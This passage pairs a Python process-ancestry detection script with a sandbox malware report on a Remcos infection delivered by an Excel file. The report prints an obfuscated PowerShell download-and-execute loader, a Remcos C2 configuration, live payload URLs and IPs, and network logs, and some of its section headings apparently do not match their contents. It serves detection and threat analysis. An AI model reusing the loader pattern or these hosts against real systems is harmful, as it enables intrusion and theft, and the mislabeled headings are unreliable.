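              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"'),
    ProcEvent(3520, 3512, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
              r"cvtres.exe /NOLOGO /READONLY ..."),
    ProcEvent(3608, 3400, r"C:\Users\user\AppData\Roaming\winiti.exe",
              r'"C:\Users\user\AppData\Roaming\winiti.exe"'),
    ProcEvent(3660, 3608, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"'),
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(1001, 1000, r"C:\Windows\System32\notepad.exe", r"notepad.exe"),
]

# Our own allow-lists, approximating the corresponding public Sigma rules.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
DOTNET_HOSTS = {"installutil.exe", "msbuild.exe", "addinprocess32.exe", "regasm.exe", "regsvcs.exe"}


def _name(image):
    """Lower-cased image file name; ntpath handles Windows separators on any host OS."""
    return ntpath.basename(image).lower()


def ancestry(pid, by_pid):
    """Root-to-leaf chain of image names, e.g. 'EXCEL.EXE > mshta.exe > cmd.exe'."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # 'seen' guards against PID-reuse loops
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return " > ".join(reversed(chain))


def detect(events):
    """Return (rule, pid, ancestry) tuples for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        child = _name(e.image)
        par = _name(parent.image) if parent else ""
        fired = []
        if par in OFFICE_APPS and child in SCRIPT_HOSTS:
            fired.append("suspicious_office_child_process")
        if par == "mshta.exe" and child in SCRIPT_HOSTS:
            fired.append("suspicious_mshta_child_process")
        if child == "csc.exe" and "\\appdata\\local\\temp\\" in e.cmdline.lower():
            fired.append("dotnet_compiler_from_temp")
        if parent and "\\appdata\\" in parent.image.lower() and child in DOTNET_HOSTS:
            fired.append("appdata_exe_spawns_dotnet_host")
        for rule in fired:
            alerts.append((rule, e.pid, ancestry(e.pid, by_pid)))
    return alerts


if __name__ == "__main__":
    for rule, pid, chain in detect(EVENTS):
        print(f"{rule:36} pid={pid:<5} {chain}")
```

Reporting the full ancestry with each alert is what turns four independent rule hits into one incident: every chain here roots in EXCEL.EXE, which is the piece of context an analyst needs to treat the csc.exe and InstallUtil.exe events as part of the document's execution rather than as developer or installer activity.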

            Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3400, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", ProcessId: 3512, ProcessName: csc.exe

Network Signatures

No Snort rule has matched.

IDS alerts (rule SIDs), sorted by timestamp:

Timestamp                         SID       Src port  Dst port  Proto  Classtype
2024-07-26T09:29:57.196366+0200   2024449   49164     80        TCP    Attempted User Privilege Gain
2024-07-26T09:29:57.196370+0200   2024197   80        49164     TCP    A Network Trojan was detected
2024-07-26T09:29:59.517525+0200   2024449   49166     80        TCP    Attempted User Privilege Gain
2024-07-26T09:29:59.517585+0200   2024197   80        49166     TCP    A Network Trojan was detected
2024-07-26T09:30:08.658935+0200   2011803   80        49167     TCP    Executable code was detected
2024-07-26T09:30:09.273374+0200   2011803   80        49167     TCP    Executable code was detected
2024-07-26T09:30:09.273433+0200   2011803   80        49167     TCP    Executable code was detected
2024-07-26T09:30:09.273467+0200   2011803   80        49167     TCP    Executable code was detected
2024-07-26T09:30:09.273485+0200   2011803   80        49167     TCP    Executable code was detected
2024-07-26T09:30:09.273537+0200   2011803   80        49167     TCP    Executable code was detected
2024-07-26T09:30:09.356706+0200   2011803   80        49167     TCP    Executable code was detected
2024-07-26T09:30:09.356737+0200   2011803   80        49167     TCP    Executable code was detected
2024-07-26T09:30:09.544003+0200   2009080   80        49167     TCP    A Network Trojan was detected
2024-07-26T09:30:16.371974+0200   2036594   49168     2558      TCP    Malware Command and Control Activity Detected
2024-07-26T09:30:20.216815+0200   2803304   49169     80        TCP    Unknown Traffic

The 49168 to 2558 alert (SID 2036594) matches the C2 port in the extracted Remcos configuration (unifrieghtmovers.com:2558).

            AV Detection

Source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: tny.wtf | Virustotal: Detection: 5%
Source: http://107.173.143.46/T2507F/csrss.exep | Virustotal: Detection: 12%
Source: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC: | Virustotal: Detection: 5%
Source: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htax | Virustotal: Detection: 5%
Source: http://107.173.143.46/T2507F/csrss.exe | Virustotal: Detection: 12%
Source: http://107.173.143.46/T2507F/csr | Virustotal: Detection: 12%
Source: http://tny.wtf/ | Virustotal: Detection: 5%
Source: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta | Virustotal: Detection: 5%
Source: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta | Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe | Virustotal: Detection: 21%
Source: Quotation.xls | ReversingLabs: Detection: 18%
Source: Quotation.xls | Virustotal: Detection: 24%
Source: Yara match | File source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 3660, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR
Source: Quotation.xls | Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 25_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: winiti.exe, 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

            Exploits

Source: Yara match | File source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR

            Privilege Escalation

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_004074FD _wcslen,CoGetObject,25_2_004074FD

            Phishing

            Source: Yara match; File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta, type: DROPPED
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.pdb source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.pdbhPD source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.pdbhPE source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.pdb source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,25_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_0044E879 FindFirstFileExA,25_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,25_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_0040783C FindFirstFileW,FindNextFileW,25_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,25_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,25_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,25_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 25_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,25_2_00407C97

            Software Vulnerabilities

            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\mshta.exe
            Source: global traffic; DNS query: name: tny.wtf
            Source: global traffic; DNS query: name: tny.wtf
            Source: global traffic; DNS query: name: unifrieghtmovers.com
            Source: global traffic; DNS query: name: geoplugin.net
            Source: global traffic; DNS query: name: geoplugin.net
            Source: global traffic; DNS query: name: tny.wtf
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 91.92.245.100:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.245.100:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
